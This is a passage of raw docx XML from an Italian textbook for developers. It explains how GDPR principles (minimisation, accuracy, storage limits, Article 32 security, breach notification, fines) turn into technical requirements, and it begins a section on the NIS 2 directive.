        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">coordinate GPS, dati di geolocalizzazione approssimata</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dati sanitari, dati genetici, dati biometrici (impronte, riconoscimento facciale)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">preferenze, cronologia di navigazione,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mi piace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">foto, video, registrazioni vocali in cui una persona è riconoscibile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In pratica, la maggior parte di ciò che un’applicazione web ordinaria salva in database o nei log è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dato personale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. E quindi è soggetto al GDPR.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="87"/>
    <w:bookmarkStart w:id="88" w:name="Xd36140e74da9ec6095a3a3584dfa3043ff958ed"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Articolo 5 — I principi che diventano requisiti tecnici</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’articolo 5 del GDPR enuncia sette principi generali. Sembrano astratti ma si traducono in requisiti tecnici precisi. Ne vediamo i quattro che riguardano direttamente chi scrive codice:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1. Minimizzazione dei dati.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Si raccolgono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">solo i dati strettamente necessari</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">alla finalità dichiarata. Il modulo di registrazione di un sito di e-commerce non deve chiedere il codice fiscale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">perché magari un giorno servirà</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Tradotto in codice: niente campi inutili nel database, niente log che memorizzano interi corpi di richieste HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per debug</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2. Esattezza.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">I dati devono essere accurati e aggiornati. Tradotto in codice: l’utente deve poter correggere e cancellare i propri dati (è il famoso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">diritto all’oblio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, art. 17). Quindi servono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di modifica e cancellazione effettiva, non semplicemente un flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">eliminato=true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lasciato a marcire nel database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= nel contesto delle applicazioni web, un punto di ingresso a cui il browser o un altro programma può fare una richiesta. Per esempio,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://miosito.it/api/utenti/42</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che probabilmente restituisce i dati dell’utente con identificativo 42. Spesso un endpoint corrisponde a una funzione del codice server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3. Limitazione della conservazione.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">I dati si conservano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">per il tempo necessario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">alla finalità. Le carte di credito non si conservano dopo che l’ordine è stato pagato. I log degli accessi non si tengono per dieci anni. Tradotto in codice: serve un meccanismo automatico (un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">job</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">schedulato) che cancella i dati scaduti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">4. Integrità e riservatezza.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">I dati devono essere protetti da accessi non autorizzati, da perdita accidentale, da distruzione. Questo principio è approfondito nell’articolo 32, che vediamo subito dopo ed è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">più importante per lo sviluppatore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="88"/>
    <w:bookmarkStart w:id="89" w:name="articolo-32-sicurezza-del-trattamento"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Articolo 32 — Sicurezza del trattamento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’articolo 32 dice testualmente che il titolare del trattamento mette in atto misure tecniche adeguate al rischio, e cita esplicitamente, fra le misure possibili:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pseudonimizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cifratura dei dati personali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">la capacità di assicurare su base permanente la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">riservatezza, l’integrità, la disponibilità e la resilienza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dei sistemi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">la capacità di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ripristinare tempestivamente la disponibilità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dei dati personali in caso di incidente fisico o tecnico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">procedura per testare, verificare e valutare regolarmente l’efficacia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">delle misure di sicurezza</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pseudonimizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">≠</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">anonimizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pseudonimizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: sostituire i dati identificativi diretti con uno pseudonimo (per esempio: nel database delle analisi di laboratorio salvi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">paziente_8472</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">invece di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Mario Rossi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ma da qualche parte esiste una tabella che collega</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">8472</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Mario Rossi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). I dati restano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">personali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">perché</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">re-identificabili</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Anonimizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: i dati sono trasformati in modo che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non sia più possibile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">risalire alla persona, nemmeno con informazioni esterne. Una volta anonimizzati, i dati escono dalla giurisdizione del GDPR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’articolo 32 è il punto in cui il GDPR si traduce direttamente nelle tecniche che impari nei capitoli successivi: hashing delle password (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), cifratura dei dati a riposo (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), controllo degli accessi (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), protezione contro le iniezioni (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="89"/>
    <w:bookmarkStart w:id="90" w:name="X25676bf6a33a2dc829a401d099a02f394c74880"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Articoli 33 e 34 — Notifica delle violazioni</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando avviene una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">violazione dei dati personali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in inglese</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">data breach</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — cioè un accesso non autorizzato, una perdita, una distruzione di dati — l’azienda ha obblighi precisi e tempistiche rigide:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Articolo 33 — entro 72 ore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: notifica al Garante per la protezione dei dati personali (in Italia: garanteprivacy.it), se il breach comporta un rischio per i diritti delle persone. La notifica deve descrivere natura del breach, categorie di dati coinvolti, numero di interessati stimato, conseguenze probabili, misure adottate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Articolo 34 — comunicazione agli interessati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: se il breach comporta un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">alto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rischio (per esempio: esposizione di password, dati sanitari, dati finanziari), gli utenti coinvolti devono essere informati personalmente, senza ingiustificato ritardo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tradotto in codice: serve un sistema di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">monitoraggio degli accessi e degli eventi anomali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">centralizzati, allarmi automatici) che renda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">tecnicamente possibile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">accorgersi del breach e ricostruirne la portata in tempi compatibili con le 72 ore. Senza questo, l’azienda non può adempiere all’obbligo di notifica anche volendo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="90"/>
    <w:bookmarkStart w:id="91" w:name="sanzioni-gdpr"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanzioni GDPR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il GDPR prevede due fasce di sanzioni amministrative:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">fino a 10 milioni di euro o 2% del fatturato annuo globale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(il maggiore dei due) per violazioni di obblighi formali (informativa, registro dei trattamenti, ecc.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">fino a 20 milioni di euro o 4% del fatturato annuo globale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(il maggiore dei due) per violazioni dei principi fondamentali, dei diritti degli interessati, dei trasferimenti internazionali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempi reali di sanzioni:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Meta (Facebook), 2023</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 1,2 miliardi di euro per trasferimenti illegittimi di dati negli Stati Uniti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Amazon, 2021</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 746 milioni di euro per consenso al marketing inadeguato</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">British Airways, 2020</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(caso del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">): 20 milioni di sterline per il breach del 2018</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Marriott, 2020</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 18,4 milioni di sterline per breach ereditato dall’acquisizione di Starwood</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le multe non sono teoriche.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="91"/>
    <w:bookmarkEnd w:id="92"/>
    <w:bookmarkStart w:id="97" w:name="X5f2f7d0b8ef8acf1d51aaaeb2b598069a452926"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="463" w:name="sec_2_3"/>
      <w:r>
        <w:t xml:space="preserve">2.3 NIS 2 — Sicurezza delle reti e dei sistemi informativi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="463"/>
    </w:p>
    <w:bookmarkStart w:id="93" w:name="cosè-e-chi-riguarda"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cos’è e chi riguarda</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">direttiva NIS 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Direttiva UE 2022/2555,</w:t>
      </w:r>
      <w:r>
